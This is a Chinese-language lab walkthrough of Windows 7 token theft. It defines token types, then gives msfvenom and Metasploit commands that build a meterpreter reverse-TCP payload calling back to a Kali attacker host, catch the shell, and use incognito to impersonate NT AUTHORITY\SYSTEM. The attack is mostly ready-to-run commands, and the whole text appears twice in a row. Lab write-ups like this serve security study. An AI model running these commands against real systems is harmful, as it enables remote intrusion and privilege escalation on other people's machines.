Windows7令牌竊取
令牌(token)
訪問令牌(Access Token):表示訪問控制操作主體的系統物件
會話令牌(Session Token):是互動會話中唯一的身份識別符號。
密保令牌(Security Token):又叫做認證令牌或硬體令牌,是一種計算機身份校驗的物理裝置,例如U盾Delegation Token:也就是授權令牌,它支援互動式登入(例如可以通過遠端桌面登入訪問)
Impresonation Token:模擬令牌,它是非互動的會話。
復現準備
靶機:Windows7 192.168.1.15
攻擊機:Kali 2021 192.168.1.16
生成反彈Shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.16 LPORT=7777 -f exe -o shell.exe
攻擊
獲取監聽
msfconsle msf6 > use exploit/multi/handler msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set lhost 192.168.1.16 lhost => 192.168.1.16 msf6 exploit(multi/handler) > set lport 7777 lport => 7777 msf6 exploit(multi/handler) > exploit
開啟靶機,雙擊生成的Shell,然後kali獲取到反彈的shell
# 進入incognito
use incognito
# 列出令牌
list_tokens -u
# 令牌假冒 SYSTEM
impersonate_token 'NT AUTHORITY\SYSTEM'
# Windows7令牌竊取
令牌(token)
訪問令牌(Access Token):表示訪問控制操作主體的系統物件
會話令牌(Session Token):是互動會話中唯一的身份識別符號。
密保令牌(Security Token):又叫做認證令牌或硬體令牌,是一種計算機身份校驗的物理裝置,例如U盾Delegation Token:也就是授權令牌,它支援互動式登入(例如可以通過遠端桌面登入訪問)
Impresonation Token:模擬令牌,它是非互動的會話。
復現準備
靶機:Windows7 192.168.1.15
攻擊機:Kali 2021 192.168.1.16
生成反彈Shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.16 LPORT=7777 -f exe -o shell.exe
攻擊
獲取監聽
msfconsle
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.1.16
lhost => 192.168.1.16
msf6 exploit(multi/handler) > set lport 7777
lport => 7777
msf6 exploit(multi/handler) > exploit
開啟靶機,雙擊生成的Shell,然後kali獲取到反彈的shell
# 進入incognito
use incognito
# 列出令牌
list_tokens -u
# 令牌假冒 SYSTEM
impersonate_token 'NT AUTHORITY\SYSTEM'